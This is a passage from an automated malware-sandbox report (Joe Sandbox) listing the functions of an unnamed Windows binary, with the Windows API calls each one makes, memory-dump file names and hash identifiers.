                                                                                                                                                        • Opcode ID: 337e55e46259a5a0ffabe32f9c531069c0685e3b669512a2fdfdf7d2dd734a1c
                                                                                                                                                        • Instruction ID: 7bca46abd75a4807caf6d2a793440f72cfc06a56d79b34cbed93887cd56d0803
                                                                                                                                                        • Opcode Fuzzy Hash: 337e55e46259a5a0ffabe32f9c531069c0685e3b669512a2fdfdf7d2dd734a1c
                                                                                                                                                        • Instruction Fuzzy Hash: 1AD0A974444322AFD7209F32E849B8237E8AF04304BA0C46AF896E2370DFB0D8808A10
                                                                                                                                                        Function 00AD13A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00AD1371,?,00AD1519), ref: 00AD13B4
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00AD13C6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                        • API String ID: 2574300362-1587604923
                                                                                                                                                        • Opcode ID: a8b585cb4dd01a5574feeac863a956c9e6905c79cc48998850a4d7d5e6995deb
                                                                                                                                                        • Instruction ID: 9c81a4f32d2f26a46b6fa40d365a30605e5d440f87de3d6036e7b510b3c4f7fc
                                                                                                                                                        • Opcode Fuzzy Hash: a8b585cb4dd01a5574feeac863a956c9e6905c79cc48998850a4d7d5e6995deb
                                                                                                                                                        • Instruction Fuzzy Hash: C3D0A930800322BFD7254F24E80878237E9AB40704F40846AE496E2778DEB0C880AB10
                                                                                                                                                        Function 00AD137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,00AD135F,?,00AD1440), ref: 00AD1389
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00AD139B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                        • API String ID: 2574300362-1071820185
                                                                                                                                                        • Opcode ID: c659f067667e00944c5c0614235454ff3d78f5f5ffe1e3ab37a5aa58cbe81413
                                                                                                                                                        • Instruction ID: 04ebe441c479b87d4572fc123cf3ef61965009cfeab51ce0cd030cc34b11884e
                                                                                                                                                        • Opcode Fuzzy Hash: c659f067667e00944c5c0614235454ff3d78f5f5ffe1e3ab37a5aa58cbe81413
                                                                                                                                                        • Instruction Fuzzy Hash: C8D0A730800322BFD7300F24E80878137D4AF04704F08845AE486E2760DA70CA809710
                                                                                                                                                        Function 00AF3ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00AF3AC2,?,00AF29F5), ref: 00AF3ADA
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00AF3AEC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                        • API String ID: 2574300362-4033151799
                                                                                                                                                        • Opcode ID: bee2754c11f49b8d0100ce4f3987edadb93fb4ad664df3c1baa0e36f0443599f
                                                                                                                                                        • Instruction ID: aeaa31b79e7753ded9f02b073be5af47c610360657d3d14fc2ad24a570518a2c
                                                                                                                                                        • Opcode Fuzzy Hash: bee2754c11f49b8d0100ce4f3987edadb93fb4ad664df3c1baa0e36f0443599f
                                                                                                                                                        • Instruction Fuzzy Hash: 59D0A931441323AFDB20AFB2E80E79637E8AB11304B0084A9F9D5E2260EFF0C9908A10
                                                                                                                                                        Function 00A9AA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00AE6AA6), ref: 00A9AB2D
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00A9AB49
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BuffCharUpper_wcscmp
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 820872866-0
                                                                                                                                                        • Opcode ID: d65307ebf491e44b543f452a8b652d9d66e75ce729cec41c26e0a76313e2b8ce
                                                                                                                                                        • Instruction ID: a487ea214d0bb0ccef3b684f1b4cbca6fbe32a5ab9fe838f5116b48215eec9b1
                                                                                                                                                        • Opcode Fuzzy Hash: d65307ebf491e44b543f452a8b652d9d66e75ce729cec41c26e0a76313e2b8ce
                                                                                                                                                        • Instruction Fuzzy Hash: DBA1F27570010A9BDF14DF65EA816AEBBF1FF58300F6485AAEC5687290EB309C70D782
                                                                                                                                                        Function 00AF0D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00AF0D85
                                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00AF0DC8
                                                                                                                                                          • Part of subcall function 00AF0458: CharLowerBuffW.USER32(?,?,?,?), ref: 00AF0478
                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00AF0FB2
                                                                                                                                                        • _memmove.LIBCMT ref: 00AF0FC2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3659485706-0
                                                                                                                                                        • Opcode ID: 899d1a3d708445196c4ac636ff4f1379941b19b4d5f3002c3f06b17884867b09
                                                                                                                                                        • Instruction ID: 232d69335450256a60055e67dd948332124639f6399325b29723ca76df1a327c
                                                                                                                                                        • Opcode Fuzzy Hash: 899d1a3d708445196c4ac636ff4f1379941b19b4d5f3002c3f06b17884867b09
                                                                                                                                                        • Instruction Fuzzy Hash: 72B19B716043048FCB14DF68C98096ABBE4EF89754F14886EF98ADB352DB31ED46CB91
                                                                                                                                                        Function 00AEAF26 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00AEAF56
                                                                                                                                                        • CoUninitialize.COMBASE ref: 00AEAF61
                                                                                                                                                          • Part of subcall function 00AD1050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00AD10B8
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00AEAF6C
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00AEB23F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 780911581-0
                                                                                                                                                        • Opcode ID: 60673f818dcf99e790023e5621ffe60505912ecb3030edf8f9003c010af2127a
                                                                                                                                                        • Instruction ID: 24970170b7df5165ba4a19ea64036902233bef72e852da57606d73483d30004b
                                                                                                                                                        • Opcode Fuzzy Hash: 60673f818dcf99e790023e5621ffe60505912ecb3030edf8f9003c010af2127a
                                                                                                                                                        • Instruction Fuzzy Hash: 5AA189356047429FCB10DF19C995B5AB7E4BF89320F048559FA9AAB3A1CB30FD40CB92
                                                                                                                                                        Function 00A9C320 Relevance: 6.3, APIs: 4, Instructions: 259fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _memmove.LIBCMT ref: 00A9C419
                                                                                                                                                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00AD6653,?,?,00000000), ref: 00A9C495
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileRead_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1325644223-0
                                                                                                                                                        • Opcode ID: 6a6f2d80aa0de09a9990b7382a121c493d9d8b09403696869d0b71d0b9a5d6f7
                                                                                                                                                        • Instruction ID: a9faf03b9e05a20d2ced600df4d91df6c0c172f7ec9856dfb0c62b98a61649d5
                                                                                                                                                        • Opcode Fuzzy Hash: 6a6f2d80aa0de09a9990b7382a121c493d9d8b09403696869d0b71d0b9a5d6f7
                                                                                                                                                        • Instruction Fuzzy Hash: FDA1AA70A04A19EBDF00CF69C984BAAFBF0FF05310F14C695E8659B291D731E960DB91
                                                                                                                                                        Function 00AB42EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3877424927-0
                                                                                                                                                        • Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                                                        • Instruction ID: f936437cd0925dba6c0f98e6ef1353e13b117e172422a7b9ef749a1ccfb2ed6b
                                                                                                                                                        • Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                                                        • Instruction Fuzzy Hash: 0C519430A003059FDF248FA989806EE77FDAF48360F288729F8759A2D3D7709D619B40
                                                                                                                                                        Function 00AFC2E7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00AFC354
                                                                                                                                                        • ScreenToClient.USER32(?,00000002), ref: 00AFC384
                                                                                                                                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00AFC3EA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3880355969-0
                                                                                                                                                        • Opcode ID: afb071c8e5aa5fd8deb59d64e15fbfc880b56e2de99182e93aef93104f2c3dfe
                                                                                                                                                        • Instruction ID: 9d69c32abb9f5d3478cde2fc65e1c28e8653b7c93024d775e6b9ed50928d301e
                                                                                                                                                        • Opcode Fuzzy Hash: afb071c8e5aa5fd8deb59d64e15fbfc880b56e2de99182e93aef93104f2c3dfe
                                                                                                                                                        • Instruction Fuzzy Hash: A2515E7190020CEFCF20DFA9C984ABE7BB6BB45361F208659FA159B291D770ED41CB90
                                                                                                                                                        Function 00ACD206 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00ACD258
                                                                                                                                                        • __itow.LIBCMT ref: 00ACD292
                                                                                                                                                          • Part of subcall function 00ACD4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00ACD549
                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00ACD2FB
                                                                                                                                                        • __itow.LIBCMT ref: 00ACD350
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$__itow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3379773720-0
                                                                                                                                                        • Opcode ID: b0bea09c49e6202d8c44221eea40400977c9627d89ed16963d748b91bdfa2d90
                                                                                                                                                        • Instruction ID: ef7afff2ac138046127a9bf73c1930dcfc00b914aa2ccfd0f9d393ec2468a55d
                                                                                                                                                        • Opcode Fuzzy Hash: b0bea09c49e6202d8c44221eea40400977c9627d89ed16963d748b91bdfa2d90
                                                                                                                                                        • Instruction Fuzzy Hash: 2B418371B00209ABDF15DF54C952FEE7BF9AF48700F000029FA05A7292DB749E45CB62
                                                                                                                                                        Function 00ADEE88 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00ADEF32
                                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00ADEF58
                                                                                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00ADEF7D
                                                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00ADEFA9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
